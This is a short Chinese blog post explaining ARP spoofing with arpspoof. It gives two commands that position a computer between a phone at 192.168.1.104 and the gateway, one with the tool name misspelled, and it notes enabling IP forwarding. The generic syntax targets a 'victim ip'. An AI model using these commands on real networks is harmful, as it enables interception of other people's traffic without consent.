企业项目管理、ORK、研发管理与敏捷开发工具平台

网站首页 > 精选文章 正文

利用arpspoof来做流量转发(arp流量攻击)

wudianyun 2025-06-23 22:47:46 精选文章 9 ℃


比如你需要转发的手机IP地址是192.168.1.104,此时你需要运行如下命令

sudo arpspoof -t 192.168.1.104 192.168.1.1 - 告诉手机,这台电脑是网关

sudo aprspoof -t 192.168.1.1 192.168.1.104 - 告诉网关这台才是手机


另外打开ip转发,这样系统才会把流量给网关,而不是断网。



可以看到arpspoof的语法为

arpspoof -t [victim ip] [gateway ip]

arpspoof -t [gateway ip] [victim ip]

Tags:

最近发表
标签列表